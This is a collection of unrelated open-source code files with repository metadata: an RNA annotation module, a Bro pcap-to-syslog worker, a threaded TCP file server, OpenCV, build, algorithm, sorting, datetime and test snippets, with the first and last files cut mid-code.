This function allows N overhang nucleotides.
Example:
>>> from xplib.Annotation import Bed
>>> from AnnoMax import overlap
>>> bed1=Bed(["chr1",10000,12000])
>>> bed2=Bed(["chr1",9000,13000])
>>> print IsPartOf(bed1,bed2)
True
"""
N=5
try:
return ((bed1.stop <= bed2.stop + N) and (bed1.start >= bed2.start)) or ((bed1.stop <= bed2.stop) and (bed1.start >= bed2.start - N))
except:
return False
def Subtype(bed1,genebed,typ):
"""
This function determines intron or exon or utr from a BED12 file.
:param bed1: A Bed object defined by `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (BAM2X)
:param genebed: A Bed12 object representing a transcript defined by xplib Annotaton.Bed with information of exon/intron/utr from an BED12 file
:returns: str -- RNA subtype. "intron"/"exon"/"utr3"/"utr5"/"."
Example:
>>> from xplib.Annotation import Bed
>>> from xplib import DBI
>>> from AnnoMax import Subtype
>>> bed1=Bed(["chr13",40975747,40975770])
>>> a=DBI.init("../../Data/Ensembl_mm9.genebed.gz","bed")
>>> genebed=a.query(bed1).next()
>>> print Subtype(bed1,genebed)
"intron"
"""
N=0.85
subtype="intron"
if typ != "protein_coding":
if overlap(bed1,genebed.utr3()):
for i in genebed.utr3().Exons():
if IsPartOf(bed1,i):
subtype="utr3"
elif overlap(bed1,genebed.utr5()):
for i in genebed.utr5().Exons():
if IsPartOf(bed1,i):
subtype="utr5"
else:
for i in genebed.Exons():
if IsPartOf(bed1,i):
subtype="exon"
break
else:
# print bed1
# print genebed.utr3().start, genebed.utr3().stop
if overlap(bed1,genebed.utr3()):
# print "If passed"
# print len(genebed.utr3().Exons())
for i in genebed.utr3().Exons():
if overlap(bed1,i):
subtype="utr3"
elif overlap(bed1,genebed.utr5()):
for i in genebed.utr5().Exons():
if overlap(bed1,i):
subtype="utr5"
else:
max_overlap=0
flag=0
for i in genebed.Exons():
if IsPartOf(bed1,i):
subtype="exon"
flag=1
break
elif overlap(bed1,i):
nt=min(bed1.stop,i.stop)-max(bed1.start,i.start)
if nt > max_overlap:
max_overlap = nt
if flag==0 and max_overlap/float(bed1.stop-bed1.start)>=N:
subtype="part_exon"
return subtype
def optimize_annotation(c_dic,bed,ref_detail):
'''
This function will select an optimized annotation for the bed region from the genes in c_dic.
It will select the annotation based on a list of priorities.
The list of priorities is: exon/utr of coding transcript > small RNA > exon of lincRNA > small RNA > exon/utr of nc transcript > intron of mRNA > intron of lincRNA.
Genes on the same strand as the read(ProperStrand) will always have higher priority than those on the opposite strand (NonProperStrand). Repeat elements have the lowest priority (except rRNA_repeat according to the annotation files)
'''
#keep only one record for each type is enough
#print c_dic
ftyp=""
fname=""
fsubtype=""
fstrandcol=""
if "rRNA" in c_dic:
ftyp=c_dic["rRNA"][0][0]
fname=c_dic["rRNA"][0][1]
fsubtype=c_dic["rRNA"][0][2]
fstrandcol=c_dic["rRNA"][0][3]
return [ftyp,fname,fsubtype,fstrandcol]
if "short_nc" in c_dic and ftyp=="":
ftyp=c_dic["short_nc"][0][0]
fname=c_dic["short_nc"][0][1]
fsubtype=c_dic["short_nc"][0][2]
fstrandcol=c_dic["short_nc"][0][3]
return [ftyp,fname,fsubtype,fstrandcol]
if "protein_coding" in c_dic:
for ind in xrange(len(c_dic["protein_coding"])-1,-1,-1):
gene=c_dic["protein_coding"][ind]
# print gene
flag=0
pe_flag=0
tmp=""
for hit in ref_detail.query(bed):
tempname=hit.id.split("&")
#print tempname
if gene[1]==tempname[0]:
gene[2]=Subtype(bed,hit,tempname[1])
if gene[2]!="intron":
if tempname[1]=="protein_coding" and gene[2]!="intron" and gene[2]!="part_exon":
#exon or utr of coding transcript
flag=1
break
elif tempname[1]!="protein_coding":
#exon or utr of non-coding transcript. Record the subtype. If the bed doesn't overlap with any exons, it wll be annotated as protein_coding-noncoding
tmp=gene[2]
flag=2
elif tempname[1]=="protein_coding" and gene[2]=="part_exon":
#the bed cover part of an exon. If it doesn't overlap with utr or exon of other transcript, it will be annotated as exon.
pe_flag=1
# print flag,pe_flag
# print gene[2]
if flag==1 and gene[2]!="intron": ##if gene type == protein_coding
ftyp=gene[0]
fname=gene[1]
fsubtype=gene[2]
fstrandcol=gene[3]
break
elif pe_flag==1:
ftyp=gene[0]
fname=gene[1]
fsubtype="exon"
fstrandcol=gene[3]
elif flag==2:
c_dic["protein_coding-noncoding"]=[["protein_coding-noncoding",gene[1],tmp,gene[3]]]
##it's fine to keep the same gene in the "protein_coding" list because intron has the lowest priority. All of the subtype should be intron.
elif gene[2]==".":
#if the bed is in intergenic region, remove this gene from the dictionary.
c_dic["protein_coding"].remove(gene)
if not c_dic["protein_coding"]:
c_dic.pop("protein_coding",None)
del gene
if "lincRNA" in c_dic and ftyp=="":
for gene in c_dic["lincRNA"]:
flag=0
for hit in ref_detail.query(bed):
if flag==0:
tempname=hit.id.split("&")
if gene[1]==tempname[0]:
gene[2]=Subtype(bed,hit,tempname[1])
if gene[2]!="intron":
flag=1
if gene[2]!="intron":
gene[2]="exon"
ftyp=gene[0]
fname=gene[1]
fsubtype=gene[2]
fstrandcol=gene[3]
break
del gene
if ftyp=="":
if "other" in c_dic:
gene=c_dic["other"][0]
elif "protein_coding-noncoding" in c_dic:
gene=c_dic["protein_coding-noncoding"][0]
elif "protein_coding" in c_dic:
gene=c_dic["protein_coding"][0]
elif "lincRNA" in c_dic:
gene=c_dic["lincRNA"][0]
try:
ftyp=gene[0]
fname=gene[1]
fsubtype=gene[2]
fstrandcol=gene[3]
except:
pass
return [ftyp,fname,fsubtype,fstrandcol]
def annotation(bed,ref_allRNA,ref_detail,ref_repeat):
"""
This function is based on :func:`overlap` and :func:`optimize_annotation` and :func:`Subtype` functions to annotate RNA type/name/subtype for any genomic region.
This function will first find genes with maximum overlap with bed, and use the function optimize_annotation to select an optimized annotation for the bed with following steps:
* Find hits (genes) with overlaps larger than Perc_overlap of the bed region length and build dic
* Find hits (genes) with overlaps between (Perc_max * max_overlap, max_overlap) and build P_dic (for ProperStrand), N_dic (for NonProperStrand).
* Find an annotation for the bed region among the hits.
:param bed: A Bed object defined by `xplib.Annotation.Bed <http://bam2xwiki.appspot.com/bed>`_ (in BAM2X).
:param ref_allRNA: the `DBI.init <http://bam2xwiki.appspot.com/DBI>`_ object (from BAM2X) for bed6 file of all kinds of RNA
:param ref_detail: the `DBI.init <http://bam2xwiki.appspot.com/DBI>`_ object for bed12 file of lincRNA and mRNA with intron, exon, UTR
:param ref_detail: the `DBI.init <http://bam2xwiki.appspot.com/DBI>`_ object for bed6 file of mouse repeat
:returns: list of str -- [type,name,subtype, strandcolumn]
Example:
>>> from xplib.Annotation import Bed
>>> from xplib import DBI
>>> from AnnoMax import annotation
>>> bed=Bed(["chr13",40975747,40975770])
>>> ref_allRNA=DBI.init("all_RNAs-rRNA_repeat.txt.gz","bed")
>>> ref_detail=DBI.init("Data/Ensembl_mm9.genebed.gz","bed")
>>> ref_repeat=DBI.init("Data/mouse.repeat.txt.gz","bed")
>>> print annotation(bed,ref_allRNA,ref_detail,ref_repeat)
["protein_coding","gcnt2","intron","ProperStrand"]
"""
Perc_overlap=0.7
Perc_max=0.85
flag=0
typ = "non"
name = "."
subtype = "."
strandcol = "ProperStrand"
ftyp = ""
fname = ""
fsubtype = ""
fstrandcol = ""
bed_len=bed.stop-bed.start+1
max_overlap = 0 # find annotation with largest overlap
overlap_dic={} #key: overlap length element: list of genes
P_dic={} #dictionary of properstrand. Key: type
N_dic={} #dictionary of nonproperstrand. Key type
##construct overlap_dic
for hit in ref_allRNA.query(bed):
overlap = min(hit.stop,bed.stop)-max(hit.start,bed.start)
if overlap >= Perc_overlap * bed_len and overlap!=0:
name=hit.id.split(".",1)[1]
typ=hit.id.split(".")[0]
if not IsProperStrand(hit, bed):
strandcol = "NonProperStrand"
else:
strandcol = "ProperStrand"
if overlap not in overlap_dic:
overlap_dic[overlap]=[]
overlap_dic[overlap].append([typ,name,subtype,strandcol])
if overlap > max_overlap:
max_overlap = overlap
##construct P_dic and N_dic
#print overlap_dic
for key in overlap_dic.keys():
# print key
if key >= max_overlap * Perc_max:
for gene in overlap_dic[key]:
# print gene
typ = gene[0]
name = gene[1]
subtype = gene[2]
strandcol = gene[3]
if strandcol == "ProperStrand":
if typ=="protein_coding" or typ=="lincRNA":
if typ in P_dic:
P_dic[typ].append([typ,name,subtype,strandcol])
else:
P_dic[typ]=[[typ,name,subtype,strandcol]]
elif typ=="rRNA_repeat" or typ=="rRNA":
if "rRNA" in P_dic:
P_dic["rRNA"].append([typ,name,subtype,strandcol])
else:
P_dic["rRNA"]=[[typ,name,subtype,strandcol]]
elif typ=="snoRNA" or typ=="miRNA" or typ=="snRNA":
if "short_nc" in P_dic:
P_dic["short_nc"].append([typ,name,subtype,strandcol])
else:
P_dic["short_nc"]=[[typ,name,subtype,strandcol]]
else:
if "other" in P_dic:
P_dic["other"].append([typ,name,subtype,strandcol])
else:
P_dic["other"]=[[typ,name,subtype,strandcol]]
elif strandcol == "NonProperStrand":
if typ=="protein_coding" or typ=="lincRNA":
if typ in N_dic:
N_dic[typ].append([typ,name,subtype,strandcol])
else:
N_dic[typ]=[[typ,name,subtype,strandcol]]
elif typ=="rRNA_repeat" or typ=="rRNA":
if "rRNA" in N_dic:
N_dic["rRNA"].append([typ,name,subtype,strandcol])
else:
N_dic["rRNA"]=[[typ,name,subtype,strandcol]]
elif typ=="snoRNA" or typ=="miRNA" or typ=="snRNA":
if "short_nc" in N_dic:
N_dic["short_nc"].append([typ,name,subtype,strandcol])
else:
N_dic["short_nc"]=[[typ,name,subtype,strandcol]]
else:
if "other" in N_dic:
N_dic["other"].append([typ,name,subtype,strandcol])
else:
N_dic["other"]=[[typ,name,subtype,strandcol]]
##select optimized annotation
if P_dic:
[ftyp,fname,fsubtype,fstrandcol] = optimize_annotation(P_dic,bed,ref_detail)
if ftyp=="" and N_dic:
[ftyp,fname,fsubtype,fstrandcol] = optimize_annotation(N_dic,bed,ref_detail)
if ftyp=="":
max_overlap=0
#typ=="non" try repeat masker
#we are not using any stringent threshold here. According to the annotation, different types of repeat element, such as LINE and SINE, are (usually) exclusive.
#For example, if one element is annotated as LINE, it won't be SINE at the same time.
for hit in ref_repeat.query(bed):
overlap = min(hit.stop,bed.stop)-max(hit.start,bed.start)
if overlap > max_overlap and overlap >= Perc_overlap * bed_len:
max_overlap=overlap
tempname=hit.id.split("&")
name = tempname[0]
typ = tempname[1]
subtype = tempname[2]
if not IsProperStrand(hit, bed):
strandcol = "NonProperStrand"
else:
strandcol = "ProperStrand"
if max_overlap>0:
ftyp=typ
fname=name
fsubtype=subtype
fstrandcol=strandcol
else:
ftyp="non"
fname="."
fsubtype="."
fstrandcol="ProperStrand"
return [ftyp,fname,fsubtype,fstrandcol]
| Zhong-Lab-UCSD/MARIO | src/AnnoMax/__init__.py | __init__.py | py | 16,575 | python | en | code | 0 | github-code | 36 |
14919660857 | #!/usr/bin/env python
# Brocapi RQ Worker
__copyright__ = """
Copyright 2017 FireEye, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__license__ = "Apache 2.0"
import glob
import logging
import os
import subprocess
import brocapi_syslog
TYPE_BLACKLIST = [
"capture_loss",
"stats",
"loaded_scripts",
"packet_filter"
]
def process_job(job_uuid, job_tag, pcaps, bro_bin,
bro_processing_dir, syslog_host, syslog_port,
syslog_proto, syslog_prefix):
logging.info("Received job: %s", job_uuid)
bro_log_dir = bro_processing_dir + job_uuid + "/logs/bro/"
logging.info("Moving into Bro log dir: %s", bro_log_dir)
os.chdir(bro_log_dir)
for pcap in pcaps:
pcap_path = bro_processing_dir + job_uuid + '/pcaps/' + pcap
logging.debug("Calling bro for pcap %s as part of job %s", pcap_path, job_uuid)
try:
subprocess.call([
bro_bin,
"-C",
"-r",
pcap_path,
"local"])
except Exception as e:
logging.error("Bro processing failed for pcap %s", pcap)
logging.error(e)
# Get all the relevant bro logs in the dir
bro_logs = glob.glob('*.log')
logging.debug("Found bro logs: %s", str(bro_logs))
if len(bro_logs) == 0:
logging.error("No bro logs present for job %s", job_uuid)
return False
# Connect to syslog server
logging.debug("Creating a syslog broker socket to %s:%s over %s for job %s", syslog_host, syslog_port, syslog_proto, job_uuid)
broker_socket = brocapi_syslog.connect_syslog(syslog_host, syslog_port, syslog_proto)
if not broker_socket:
return False
# Loop through all log types
for _log in bro_logs:
logging.debug("Processing log %s for job %s", _log, job_uuid)
bro_type = _log.split(".")[0]
if bro_type in TYPE_BLACKLIST:
logging.debug("Skipping blacklisted type %s for job %s", bro_type, job_uuid)
continue
syslog_program = syslog_prefix % bro_type
# handle every line in the log file
with open(_log) as bro_file:
for line in bro_file:
if line.startswith("#"):
continue
if job_tag is None:
job_tag = "brocapi"
syslog_message = brocapi_syslog.format_syslog_message(job_tag, syslog_program, line)
broker_socket.send(syslog_message)
# close out the socket
broker_socket.close()
| fireeye/brocapi | brocapi/brocapi_worker.py | brocapi_worker.py | py | 3,053 | python | en | code | 27 | github-code | 36 |
6964149884 | # 多线程,并发服务器
from socket import *
from threading import *
from TCPpack import recvall,get_block,put_block
def get_filecontent(fileName):
'''读取文件内容'''
try:
# open()以二进制格式打开一个文件用于只读
with open('D:/TCPfiletransport/' + fileName, "rb") as f:
# read() 每次读取整个文件,将文件内容放到一个字符串变量中
content = f.read()
return content #文本
except (FileNotFoundError):
print("没有找到文件")
return
def handle(client_socket):
'''负责和客户端之间的通信'''
print("有新的客户端建立连接")
while True: # 不断接收用户的下载请求
# 接收客户端发送的文件名
recv_data = client_socket.recv(1024).decode('utf-8')
# 客户端请求退出
if recv_data == 'quit':
client_socket.close() # 关闭套接字
print("有一个客户端已退出")
break
print("客户端请求下载的文件名为:" + recv_data)
# 获取并发送文件长度+内容
if get_filecontent(recv_data):
myfile = get_filecontent(recv_data)
put_block(client_socket, myfile)
else: # 发送''代表没有找到文件
put_block(client_socket, ''.encode("utf-8"))
def main():
server = socket(AF_INET, SOCK_STREAM) # 创建socket
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, True) # 设置端口复用
address = ('', 8889) # 本地信息
server.bind(address) # 绑定
# 使用socket创建的套接字默认是主动模式,将其变为被动模式,接收客户端连接请求
server.listen(128) # 128是可以监听的最大数量
while True:
# 如果有新的客户端来链接服务器,那么就产生一个新的套接字
# client_socket用来为这个客户端服务
# server等待其他客户端的链接
client_socket, client_addr = server.accept()
# 给每个客户端创建一个独立的线程进行管理
thread = Thread(target=handle, args=(client_socket,))
# 设置成守护线程,防止主进程退出之后,子线程不退出
thread.setDaemon(True)
# 启动线程
thread.start()
if __name__ == '__main__':
main() | laputae/TCPdownload | Server2.py | Server2.py | py | 2,368 | python | zh | code | 0 | github-code | 36 |
40107696527 | import numpy as np
import cv2 as cv
flower2 = "../mysamples/flower2.jpg"
# flower2 = "/home/mmni/projects/opencv-python/mysamples/flower2.jpg"
img = cv.imread(flower2)
someflowers = img[2000:2200, 2300:2500]
# someflowers = img[200:400, 600:800]
img[100:300, 200:400] = someflowers
cv.imshow("flowers", img)
cv.imshow("flowers some", someflowers)
cv.waitKey(150000)
cv.destroyAllWindows()
exit(0) | ekim197711/opencv-python | core/part-of-image.py | part-of-image.py | py | 400 | python | en | code | 0 | github-code | 36 |
950208402 | pkgname = "giflib"
pkgver = "5.2.1"
pkgrel = 0
build_style = "makefile"
make_cmd = "gmake"
hostmakedepends = ["gmake", "xmlto"]
pkgdesc = "Library to handle, display and manipulate GIFs"
maintainer = "q66 <q66@chimera-linux.org>"
license = "MIT"
url = "https://sourceforge.net/projects/giflib"
source = f"$(SOURCEFORGE_SITE)/{pkgname}/{pkgname}-{pkgver}.tar.gz"
sha256 = "31da5562f44c5f15d63340a09a4fd62b48c45620cd302f77a6d9acf0077879bd"
tool_flags = {"CFLAGS": ["-fPIC"]}
def post_install(self):
self.install_license("COPYING")
@subpackage("giflib-devel")
def _devel(self):
return self.default_devel()
@subpackage("giflib-progs")
def _progs(self):
return self.default_progs()
| chimera-linux/cports | main/giflib/template.py | template.py | py | 695 | python | en | code | 119 | github-code | 36 |
28513694147 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
import os
import shutil
from opus_core.resources import Resources
from abstract_emme2_travel_model import AbstractEmme2TravelModel
class RestoreTripTables(AbstractEmme2TravelModel):
"""Copy original trip tables to the 'triptabs' directory of the travel model.
"""
def run(self, config, source_directory, year):
base_dir = self.get_emme2_base_dir()
dst = os.path.join(base_dir, 'triptabs')
src = os.path.join(base_dir, source_directory)
backup = os.path.join(base_dir, 'triptabs.last')
if os.path.exists(backup):
shutil.rmtree(backup)
if os.path.exists(dst):
shutil.copytree(dst, backup)
shutil.rmtree(dst)
shutil.copytree(src, dst)
if __name__ == "__main__":
try: import wingdbstub
except: pass
from optparse import OptionParser
from opus_core.file_utilities import get_resources_from_file
parser = OptionParser()
parser.add_option("-r", "--resources", dest="resources_file_name", action="store", type="string",
help="Name of file containing resources")
parser.add_option("-y", "--year", dest="year", action="store", type="int",
help="Year for which the emme2 directory is defined in the configuration.")
parser.add_option("-d", "--directory", dest="directory", action="store", type="string", default="triptabs.org",
help="Name of sub-directory containing original trip tables (relative to the emme2 directory).")
(options, args) = parser.parse_args()
r = get_resources_from_file(options.resources_file_name)
resources = Resources(get_resources_from_file(options.resources_file_name))
RestoreTripTables().run(resources, options.directory, options.year)
| psrc/urbansim | opus_emme2/models/restore_trip_tables.py | restore_trip_tables.py | py | 2,003 | python | en | code | 4 | github-code | 36 |
8436779783 | # Given an array of positive numbers and a positive number ‘k,’ find the maximum sum of any contiguous subarray of size ‘k’.
def find_max_sum(arr, k):
sum = 0
max_sum = 0
for i in range(len(arr)):
sum += arr[i]
if i > k-1:
sum -= arr[i-k]
max_sum = max(max_sum, sum)
return max_sum
#Given an array of positive numbers and a positive number ‘S,’ find the length of the smallest contiguous subarray whose sum is greater than or equal to ‘S’. Return 0 if no such subarray exists.
def smallest_subarray_with_sum(arr, target):
left = 0
min_length = len(arr)
for i in range(len(arr)):
sum += arr[i]
while sum > target:
min_length = min(min_length, i - left + 1)
sum -= arr[left]
left += 1
return min_length
from collections import Counter
# Given a string, find the length of the longest substring in it with no more than K distinct characters.
def longest_substring_with_k_distinct_characters(s, k):
left = 0
char_count = Counter()
distinct = 0
max_length = 0
for i, c in enumerate(s):
if char_count[c] == 0:
distinct += 1
char_count[c] += 1
while distinct > k:
char_count[s[left]] -= 1
if char_count[s[left]] == 0:
del char_count[s[left]]
distinct -= 1
left += 1
max_length = max(max_length, i - left + 1)
return max_length
# Given a string, find the length of the longest substring, which has no repeating characters.
def longest_length_with_unique_characters(s):
char_count = {}
left = 0
max_l = 0
for i, c in enumerate(s):
if c in char_count:
if char_count[c] >= left:
left = char_count[c] + 1
max_l = max(i - left + 1, max_l)
char_count[c] = i
return max(max_l, len(s) - left)
# Longest Substring with Same Letters after Replacement
# Given a string with lowercase letters only, if you are allowed to replace no more than ‘k’ letters with any letter,
# find the length of the longest substring having the same letters after replacement.
def find_longest_substring_with_same_characters_after_k_replacements(s, k):
# find window that has k characters that are not the character with max count
char_count = {}
max_count = 0
l = 0
max_l = 0
for i, c in enumerate(s):
if c in char_count:
char_count[c] += 1
if char_count[c] > max_count:
max_count = char_count[c]
else:
char_count[c] = 1
while i - l - max_count > k:
char_count[s[l]] -= 1
if char_count[s[l]] == 0:
del char_count[s[l]]
l += 1
max_l = max(max_l, i-l+1)
return max_l
# Given an array containing 0s and 1s, if you are allowed to replace no more than ‘k’ 0s with 1s, find the length of the longest contiguous subarray having all 1s.
def find_length_of_array_having_ones_with_k_replacements(arr, k):
max_l = 0
left = 0
ones_counter = 0
zeros = 0
for i, n in enumerate(arr):
if n == 1:
ones_counter+=1
else:
zeros += 1
while i - left - ones_counter > k:
if arr[left] == 1:
ones_counter -= 1
left += 1
max_l = max(max_l, i - left + 1)
return max_l
def permutation_in_a_string(s, perm):
p_count = Counter(perm)
s_count = Counter()
for i, c in enumerate(s):
s_count[c] += 1
if i >= len(perm)-1:
s_count[i-len(perm)] -=1
if s_count[i-len(perm)] == 0:
del s_count[i-len(perm)]
if s_count == p_count:
return True
import math
def min_window_substring(s, t):
t_char_count = Counter(t)
keys_to_cover = len(t)
left = 0
min_length = math.inf
start, end = -1, -1
for i, c in enumerate(s):
if c in t_char_count:
t_char_count[c] -= 1
keys_to_cover -= 1
if t_char_count[c] == 0:
del t_char_count[c]
while keys_to_cover == 0:
if i -left +1 < min_length:
min_length = min(min_length, i - left + 1)
start = left
end = i
if s[left] in t_char_count:
t_char_count[s[left]] += 1
keys_to_cover += 1
left += 1
return s[start:end]
def check_if_word_concatenation_of_substrings(s, words):
words_count = Counter(words)
words_to_cover = len(words)
unit_size = len(words[0])
res = []
for i in range(0, len(s) - words_to_cover * unit_size +1):
substr = s[i:i+unit_size]
print("start checking at index ", i, substr)
if substr in words_count:
j = i
mapper = Counter(words)
words_to_cover = len(words)
print("before while loop: ")
while True:
print(s[j:j+unit_size])
print(mapper)
if s[j:j+unit_size] in mapper:
mapper[s[j:j+unit_size]] -= 1
words_to_cover -= 1
if mapper[s[j:j+unit_size]] == 0:
del mapper[s[j:j+unit_size]]
if words_to_cover == 0:
res.append(i)
else:
break
print("after while loop: ", mapper, "\n****")
j += unit_size
return res
if __name__ == '__main__':
print(check_if_word_concatenation_of_substrings("wordgoodgoodgoodbestword", ["word","good","best","good"]))
print(check_if_word_concatenation_of_substrings("bagfoxcat", ["cat", "fox"]))
print(check_if_word_concatenation_of_substrings("barfoothefoobarman", ["foo", "the"]))
print(check_if_word_concatenation_of_substrings("barfoofoobarthefoobarman", ["bar","foo","the"])) | kashyapa/coding-problems | april19th/sliding-window/sliding_window.py | sliding_window.py | py | 5,992 | python | en | code | 0 | github-code | 36 |
14516098985 | import random
import time
import sys
print(sys.setrecursionlimit(3000))
def partition(A, p, r, q):
pivot=A[q]
i=p-1
for j in range(p, r):
if A[j] <= pivot:
i+=1
temp=A[i]
A[i]=A[j]
A[j]=temp
temp=A[i+1]
A[i+1]=A[r]
A[r]=temp
return i+1
def quicksort_last(A):
def quicksort_last_h(A, p, r):
if p<r:
q=partition(A, p, r, r)
quicksort_last_h(A, p, q-1)
quicksort_last_h(A, q+1, r)
quicksort_last_h(A, 0, len(A)-1)
list1=[1488, 88, 420, 69, 14, 666]
def quicksort_random(A):
def quicksort_random_h(A, p, r):
if p<r:
if (p-r)>2:
a=random.randint(p, r)
b=random.randint(p, r)
c=random.randint(p, r)
keys=[A[a], A[b], A[c]]
keys.sort()
pivot=A.index(keys[1])
else:
pivot=r
q=partition(A, p, r, pivot)
quicksort_random_h(A, p, q-1)
quicksort_random_h(A, q+1, r)
quicksort_random_h(A, 0, len(A)-1)
list_sizes=[10, 100, 200, 500, 1000, 1500, 2000]
def generate_sorted_list(size):
slist=[]
for i in range(size):
slist.append(i)
return slist
def generate_random_list(size):
rlist=[]
for i in range(size):
rlist.append(random.randint(0, 1000))
return rlist
def test_time(func, input):
x=time.time()
func(input)
y=time.time()
return y-x
for size in list_sizes:
sorted=generate_sorted_list(size)
random_l=generate_random_list(size)
t1=test_time(quicksort_last, sorted)
t2=test_time(quicksort_last, random_l)
print("Runtime for list of size {} using version 1 is {} for a sorted list and {} for a random list.".format(size, t1, t2))
for size in list_sizes:
sorted=generate_sorted_list(size)
random_l=generate_random_list(size)
t1=test_time(quicksort_random, sorted)
t2=test_time(quicksort_random, random_l)
print("Runtime for list of size {} using version 2 is {} for a sorted list and {} for a random list.".format(size, t1, t2))
| byama382/3500-hw | 3500hw7.py | 3500hw7.py | py | 2,222 | python | en | code | 0 | github-code | 36 |
34821999765 | t = int(input())
for _ in range(t):
l1, l2, l3 = list(map(int, input().split()))
p, r = divmod(l1 + l2 + l3, 2)
if r != 0:
print("NO")
else:
if (l1 == l2 and (l3 % 2 == 0)) or (l1 == l3 and (l2 % 2 == 0)) or (l2 == l3 and (l1 % 2 == 0)):
print("YES")
elif (l1 + l2 == l3) or (l1 + l3 == l2) or (l2 + l3 == l1):
print("YES")
else:
print("NO")
| easimonenko/codeforces-problems-solutions | contest-1622-educational-120/a.py | a.py | py | 427 | python | en | code | 1 | github-code | 36 |
72166992744 | import datetime
def get_period(start_day: str, n_days: int) -> list:
''' get the list of string dates from <start_date> <n_days> backwards '''
datelst = [datetime.datetime.strptime(start_day, '%Y-%m-%d') - datetime.timedelta(days=x) for x in range(n_days)]
datelst = [x.strftime('%Y-%m-%d') for x in datelst]
return datelst
def convert_datetime(df, sin_cos=False):
start_time = time.time()
sh = df.shape
print("datetime conversion started...")
df['hour'] = df.created_ts.apply(get_hour)
df['weekday'] = df.created_ts.apply(get_weekday)
df['day'] = df.created_ts.apply(get_day)
if sin_cos:
df = sin_cos_encoding(df, 'hour', 24)
df = sin_cos_encoding(df, 'weekday', 7)
df = sin_cos_encoding(df, 'day', 30)
tests.test_df_shape(sh, 3*2, df.shape)
else:
tests.test_df_shape(sh, 3, df.shape)
print(f"datetime conversion completed, time : {int(time.time() - start_time)}s")
return df
def dt_string_converter(df, dt_column, fmt="datetime"):
'''convert string to datetime & vice versa,
fmt: [datetime/string]'''
if all([fmt == "datetime", df[dt_column].dtype == "object"]):
df[dt_column] = df[dt_column].apply(lambda v: datetime.datetime.strptime(v, "%Y-%m-%d %H:%M:%S"))
if all([fmt == "string", df[dt_column].dtype == "<M8[ns]"]):
df[dt_column] = df[dt_column].apply(lambda v: datetime.datetime.strftime(v, "%Y-%m-%d %H:%M:%S"))
try:
assert df[dt_column].dtype == {"datetime":"<M8[ns]", "string":"object"}[fmt]
except AssertionError:
print(f"datetime string converter failed")
return df
| qCircuit/unos_scripts | datetime.py | datetime.py | py | 1,675 | python | en | code | 0 | github-code | 36 |
4778228979 | from pathlib import Path
import re
import subprocess
import numpy as np
import pytest
from transformer_engine.paddle.fp8 import is_fp8_available
test_root = Path(__file__).resolve().parent
is_fp8_supported, reason = is_fp8_available()
@pytest.mark.skipif(not is_fp8_supported, reason=reason)
@pytest.mark.parametrize('use_reentrant', [False, True])
def test_transformer_encoder_recompute(use_reentrant):
"""
Test TransformerLayer encoder recompute
"""
rtol = 1e-5
atol = 1e-5
def launch_subprocess_and_check_output(enable_recompute):
"""Launch training in subprocess and check output"""
try:
cmd = [
'python',
str(test_root / 'recompute_tests' / 'recompute_transformer_encoder.py'),
str(int(enable_recompute)),
str(int(use_reentrant))
]
result = subprocess.check_output(cmd, stderr=subprocess.STDOUT, universal_newlines=True)
print(result)
loss_match = re.search(r'Loss:\s+(-?\d+\.\d+)', result)
memory_match = re.search(r'Peak memory:\s+(\d+)', result)
loss_value = float(loss_match.group(1))
memory_value = int(memory_match.group(1))
return loss_value, memory_value
except subprocess.CalledProcessError as e:
raise ValueError(f"Subprocess failed with error: {e}") from e
loss_recompute, peak_memory_recompute = launch_subprocess_and_check_output(True)
loss_ref, peak_memory_ref = launch_subprocess_and_check_output(False)
assert peak_memory_recompute < peak_memory_ref
np.testing.assert_allclose(loss_recompute, loss_ref, rtol=rtol, atol=atol)
| NVIDIA/TransformerEngine | tests/paddle/test_recompute.py | test_recompute.py | py | 1,707 | python | en | code | 1,056 | github-code | 36 |
10528036794 | import random
IMG_ONLY_TRANSFORM = 1
MASK_ONLY_TRANSFORM = 2
JOINT_TRANSFORM = 3
RANDOM_JOINT_TRANSFORM_WITH_BORDERS = 4 # joint with randomness inside the transform that affect borders
BORDER_ONLY_TRANSFORM = 5
JOINT_TRANSFORM_WITH_BORDERS = 6
# ad hoc transform classes from https://github.com/ycszen/pytorch-seg/blob/master/transform.py
# joint transformations for image and mask
class JointCompose(object):
def __init__(self, transforms_specs):
self.transforms_specs = transforms_specs
def __call__(self, sample):
img = sample.get('img')
mask = sample.get('binary_mask')
borders = sample.get('borders')
for transform_spec in self.transforms_specs:
transform = transform_spec.transform
transform_type = transform_spec.transform_type
prob = transform_spec.prob
# check if to apply the transform, in case of a probabilistic one
apply_transform = True
if prob is not None: # probabilistic transform
if random.random() > prob:
apply_transform = False
if apply_transform:
if transform_type == IMG_ONLY_TRANSFORM:
img = transform(img)
elif transform_type == JOINT_TRANSFORM:
img = transform(img)
if mask is not None:
mask = transform(mask)
elif transform_type == JOINT_TRANSFORM_WITH_BORDERS:
img = transform(img)
if mask is not None:
mask = transform(mask)
borders = transform(borders)
if mask is not None:
if transform_type == MASK_ONLY_TRANSFORM:
mask = transform(mask)
elif transform_type == RANDOM_JOINT_TRANSFORM_WITH_BORDERS:
img, mask, borders = transform(img, mask, borders)
elif transform_type == BORDER_ONLY_TRANSFORM:
borders = transform(borders)
sample['img'] = img
sample['binary_mask'] = mask
sample['borders'] = borders
return sample
| yolish/kaggle-dsb18 | JointCompose.py | JointCompose.py | py | 2,226 | python | en | code | 0 | github-code | 36 |
71335872103 | ## Method 1 to solve the problem by using some extra memory.
def m1(mat):
n = len(mat)
m = len(mat[0])
transpose_matrix = [[0 for i in range(n)] for j in range(m)]
for i in range(0, n):
for j in range(0, m):
transpose_matrix[j][i]=mat[i][j]
return transpose_matrix
mat = [[1 ,2, 3, 4],
[5, 6, 7, 8,],
[9, 10, 11, 12],
[13 ,14 ,15 ,16]]
print(m1(mat))
## But method 1 uses extra memory can we do it without extra space???
## Method 2 , Trying to do it in-place.
def m2(mat):
n = len(mat)
m = len(mat[0])
for i in range(0, n):
for j in range(i+1, m):
